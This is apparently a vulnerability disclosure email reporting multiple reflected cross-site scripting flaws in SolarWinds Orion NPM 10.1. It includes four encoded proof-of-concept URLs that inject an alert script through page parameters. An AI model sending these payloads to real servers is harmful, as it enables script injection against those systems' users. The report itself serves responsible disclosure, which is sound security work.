Multiple XSS in Solarwinds Orion NPM 10.1
Values placed in the URI of the browser are rendered correctly. Orion NPM
10.1 has just been released, so there is no known fix available as of yet.
Examples:
Most "variable=3D" that I've checked are vulnerable:
http://<server>/Orion/NetPerfMon/MapView.aspx?Map=3D4f89095c-35fa-4b1b-813f=
-231270=3D0225b7.OrionMap&Title=3D%3Cscript%3Ealert%28%27test%27%29%3C/scri=
pt%3E
http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=3D%3Cscript%3Ea=
lert%28=3D%27test%27%29%3C/script%3E
http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=3D%3Cscript%3Eale=
rt%28%2=3D7test%27%29%3C/script%3E&I:100&view=3DInterfaceDetails
http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=3D%3Cscript%3Ea=
lert%28=3D%27test%27%29%3C/script%3E&Title=3D&SubTitle=3D&SubTitle2=3D&Widt=
h=3D0&Height=3D0&NetObject=3DI:100&CustomPollerID=3D&Rows=3D&SampleSize=3D1=
M&Period=3DYesterday&PlotStyle=3D&FontSize=3D1&NetObjectPrefix=3DI&SubsetCo=
lor=3D&R=3DYSubsetColor=3D&ResourceID=3D57&ShowTrend=3DTrue&ReturnTo=3D
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John